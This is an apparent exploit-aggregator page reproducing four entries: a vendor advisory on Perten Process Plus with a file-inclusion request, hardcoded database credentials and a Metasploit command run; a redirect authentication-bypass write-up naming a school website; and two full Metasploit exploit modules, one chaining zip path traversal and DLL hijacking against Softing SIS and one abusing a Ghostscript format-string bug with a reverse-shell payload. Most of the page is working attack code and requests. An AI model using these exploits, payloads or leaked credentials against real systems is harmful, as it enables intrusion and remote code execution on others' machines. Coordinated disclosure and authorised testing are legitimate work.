Latest exploits :: CodePwn

<pre><code>CyberDanube Security Research 20240722-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Perten Instruments Process Plus Software vulnerable version| <=1.11.6507.0 fixed version| 2.0.0 CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913 impact| High homepage| https://perkinelmer.com found| 2024-04-24 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. Weve always pursued science with a clear purpose to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers desire to work better, innovate better, and create better. PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products." Source: https://www.perkinelmer.com/ Vulnerable versions ------------------------------------------------------------------------------- ProcessPlus Software / <=1.11.6507.0 Vulnerability overview ------------------------------------------------------------------------------- 1) Unauthenticated Local File Inclusion (CVE-2024-6911) A LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration. 2) Hardcoded MSSQL Credentials (CVE-2024-6912) The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host. 3) Execution with Unnecessary Privileges (CVE-2024-6913) The software uses the user "sa" to connect to the database. Access to this account allows an attacker to execute commands via the "xp_cmdshell" procedure. Proof of Concept ------------------------------------------------------------------------------- 1) Unauthenticated Local File Inclusion (CVE-2024-6911) The LFI can be triggered by using the following GET Request: ------------------------------------------------------------------------------- GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 Host: 192.168.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- This example returns the content from "C:\Windows\System32\drivers\etc\hosts" of an affected installation. 2) Hardcoded MSSQL Credentials (CVE-2024-6912) Analysis across multiple installations show that the configuration file "\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials: ------------------------------------------------------------------------------- [...] <OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL; DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1" appid="Perten.OPCDA.Server" loglevel="info" logfile="C:\Perten\ProcessPlus\Log\opcserver.log"> [...] ------------------------------------------------------------------------------- These credentials "sa:enilno" were re-used in all reviewed installations. 3) Execution with Unnecessary Privileges (CVE-2024-6913) The application uses the "sa" user to authenticate with the database. By using Metasploit an attacker can execute arbitrary commands: ------------------------------------------------------------------------------- msf6 auxiliary(admin/mssql/mssql_exec) > show options Module options (auxiliary/admin/mssql/mssql_exec): Name Current Setting ---- --------------- CMD dir PASSWORD enilno RHOSTS 192.168.0.1 RPORT 1433 TDSENCRYPTION false TECHNIQUE xp_cmdshell USERNAME sa USE_WINDOWS_AUTHENT false msf6 auxiliary(admin/mssql/mssql_exec) > run [*] Running module against 192.168.0.1 [*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir' [...] Directory of C:\Windows\system32 01/23/2024 13:37 AM <DIR> . 01/23/2024 13:37 AM <DIR> .. 01/23/2024 13:37 AM <DIR> 0123 01/23/2024 13:37 AM <DIR> 0123 01/23/2024 13:37 AM 232 @AppHelpToast.png 01/23/2024 13:37 AM 308 @AudioToastIcon.png [...] Solution ------------------------------------------------------------------------------- Update to version 2.0.0. Workaround ------------------------------------------------------------------------------- Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself. Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface. Contact Timeline ------------------------------------------------------------------------------- 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com. 2024-05-13: Vendor asked for unencrypted advisory. 2024-05-16: Sent advisory to vendor. 2024-05-22: Asked for status update. No answer. 2024-05-28: Asked for status update. Contact stated that they are working on a fix. 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer. 2024-07-13: Asked for status update. 2024-07-15: Contact stated, that all three issues have been fixed in version 2.0.0 which have been released on 2024-07-11. 2024-07-16: Asked for a link to the firmware update release. 2024-07-17: Set release date to 2024-07-22. 2024-07-22: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2024 </code></pre>

<pre><code>==================================================================================================================================== | # Title : PPDB ONLINE V.1.3 HTML Form in redirect page Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://berkas.siap-ppdb.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Vulnerability description : An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <?php if (!isset($_SESSION["authenticated"])) { header("Location: auth.php"); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. The correct code would be <?php if (!isset($_SESSION[auth])) { header("Location: auth.php"); exit(); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  [+] infected item : /pass. [+] Attack details : Form action='' GET /pass/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass Acunetix-Aspect: enabled Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f Host: elearning7.smpn49-jkt.sch.id Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Response HTTP/1.1 302 Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/7.3.33 location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php content-type: text/html; charset=UTF-8 content-length: 16992 vary: Accept-Encoding,User-Agent date: Fri, 19 Jul 2024 10:09:49 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Original-Content-Encoding: gzip [+] The impact of this vulnerability : depends on the affected web application. [+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'zip' require 'metasploit/framework/login_scanner/softing_sis' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution', 'Description' => %q{ This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22. In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk. In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system. The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication. A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Anastasio (muffin) of Incite Team', # discovery 'Steven Seeley (mr_me) of Incite Team', # discovery 'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module ], 'References' => [ ['CVE', '2022-1373'], ['CVE', '2022-2334'], ['ZDI', '22-1154'], ['ZDI', '22-1156'], ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'], ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/'] ], 'DefaultOptions' => { 'RPORT' => 8099, 'SSL' => false, 'EXITFUNC' => 'thread', 'WfsDelay' => 300 }, 'Platform' => 'win', # the software itself only supports x64, see # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html 'Arch' => [ARCH_X64], 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2022-07-27', 'Privileged' => true, 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_fs_delete_file ] } }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']), OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']), OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']), OptString.new('DLLPATH', [false, 'Custom compiled DLL to use']) ] ) self.needs_cleanup = true end # this will be updated with the signature from "check" @signature = nil # create a checker instance to reuse code from the Softing SIS login bruteforce module def checker_instance Metasploit::Framework::LoginScanner::SoftingSIS.new( configure_http_login_scanner( host: datastore['RHOSTS'], port: datastore['RPORT'], connection_timeout: 5 ) ).dup end # check if the generated/provided signature is valid for the specified user def signature_check(user, signature) send_request_cgi({ 'method' => 'GET', 'uri' => "/runtime/core/user/#{user}/authentication", 'vars_get' => { 'User' => user, 'Signature' => signature } }) end def check # check the Softing SIS version softing_version_res = checker_instance.check_setup unless softing_version_res return CheckCode::Unknown end softing_version = Rex::Version.new(softing_version_res) print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}") # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory # so we will not continue if the version is not vulnerable unless softing_version < Rex::Version.new('1.30') return CheckCode::Safe end # if the operator provides a signature, then use that instead of the username and password if datastore['SIGNATURE'] print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...") # send a GET request to /runtime/core/user/<username>/authentication signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE']) # if we cannot connect at this point, we only know that the version is < 1.30 # the system "appears" to be vulnerable unless signature_check_res print_error("#{peer} - Connection failed!") end # if the signature is correct, 200 OK is returned if signature_check_res.code == 200 print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}") @signature = datastore['SIGNATURE'] else print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!") end # login with username and password else # get the authentication token auth_token = checker_instance.get_auth_token(datastore['USERNAME']) # generate the signature @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD']) # check the generated signatures' validity signature_check_res = signature_check(datastore['USERNAME'], @signature) # if we cannot connect, then the system "appears" to be vulnerable unless signature_check_res print_error("#{peer} - Connection failed!") end # if the signature is correct, 200 OK is returned if signature_check_res.code == 200 print_good("#{peer} - Valid credentials provided") else print_error("#{peer} - Invalid credentials!") end end # if the version is less than 1.30 it's supposedly vulnerable # but there is no way to confirm vulnerability existence without actually exploiting # so instead of "Vulnerable", return "Appears" CheckCode::Appears end def exploit # did the operator specify a custom DLL? If not... if datastore['DLLPATH'] # otherwise, just use their provided DLL and assume they compiled everything correctly # there is no way to check if it's compiled correctly anyway dll_path = datastore['DLLPATH'] else # have MSF create the malicious DLL path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334') datastore['EXE::Path'] = path datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') print_status('Generating payload DLL...') dll = generate_payload_dll dll_name = 'wbemcomn.dll' dll_path = store_file(dll, dll_name) print_status("Created #{dll_path}") end # backup the Softing SIS configuration print_status("#{peer} - Saving configuration...") get_config_zip_res = send_request_cgi({ 'method' => 'GET', 'uri' => '/runtime/core/config-download', 'vars_get' => { 'User' => datastore['USERNAME'], 'Signature' => @signature } }) # end if we cannot get the configuration for some reason unless get_config_zip_res fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration" end # status code 200 is the expected response to getting the configuration ZIP unless get_config_zip_res.code == 200 # for verbosity, save the JSON response get_config_zip_res_json = get_config_zip_res.get_json_document vprint_error("#{peer} - #{get_config_zip_res_json}") fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration" end # if successful, the body cnotains the configuration ZIP config_zip = get_config_zip_res.body # config_download.zip is the name of the configuration ZIP when downloading from the browser # append a hash based on the peer address to prevent overwriting the config file if there are multiple targets config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip" # store the config zip file config_zip_path = store_file(config_zip, config_zip_name) print_status("Saved configuration to #{config_zip_path}") # insert the malicious DLL Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile| zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path) end # restore the configuration restore_config_res = send_request_cgi({ 'method' => 'PUT', 'uri' => '/runtime/core/config-restore', 'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}", 'vars_get' => { 'User' => datastore['USERNAME'], 'Signature' => @signature }, 'data' => File.read(config_zip_path) }) # no response unless restore_config_res fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!" end # bad response unless restore_config_res.code == 200 # for verbosity, show the JSON response restore_config_res_json = restore_config_res.get_json_document vprint_error("#{peer} - #{restore_config_res_json}") fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!" end end # clean up the planted DLL if the session is meterpreter def on_new_session(session) super unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll') # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll') end end # Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file # literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce def store_file(data, filename) if !::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end if filename && !filename.empty? fname, ext = filename.split('.') else fname = "local_#{Time.now.utc.to_i}" end fname = ::File.split(fname).last fname.gsub!(/[^a-z0-9._-]+/i, '') fname << ".#{ext}" path = File.join("#{Msf::Config.local_directory}/", fname) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } full_path.dup end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Ghostscript Command Execution via Format String', 'Description' => %q{ This module exploits a format string vulnerability in Ghostscript versions before 10.03.1 to achieve a SAFER sandbox bypass and execute arbitrary commands. This vulnerability is reachable via libraries such as ImageMagick. This exploit only works against Ghostscript versions 10.03.0 and 10.01.2. Some offsets adjustement will probably be needed to make it work with other versions. }, 'Author' => [ 'Thomas Rinsma', # Vuln discovery and PoC 'Christophe De La fuente' # Metasploit module ], 'References' => [ ['CVE', '2024-29510'], ['URL', 'https://bugs.ghostscript.com/show_bug.cgi?id=707662'], ['URL', 'https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/'] ], 'DisclosureDate' => '2024-03-14', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Linux Command', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix', 'linux' ], 'DefaultOptions' => { # Payload is not set automatically when selecting this target. # Select a x64 fetch payload by default. 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options([ OptString.new('FILENAME', [true, 'Output Encapsulated PostScript (EPS) file', 'msf.eps']), OptInt.new('INDEX_OUT_PTR', [true, 'Index of `gp_file *out` on the stack (see the full documentation for details `info -d`)', 5]) ]) end def exploit xploit = template.sub('MSF_PAYLOAD', payload.encoded) xploit = xploit.sub('MSF_IDXOUTPTR', datastore['INDEX_OUT_PTR'].to_s) file_create(xploit) print_good('You will need to start a handler for the selected payload first.') print_good("Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY #{datastore['FILENAME']}") print_good("Example usage with ImageMagick: identify #{datastore['FILENAME']}") end def template xploit = File.read(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2024-29510', 'ghostscript_format_string.eps' )) # Remove comments xploit.gsub!(/\s*% .+$/, '') # Remove empty lines and lines with a single % xploit.gsub(/^%?$\n/, '') end end </code></pre>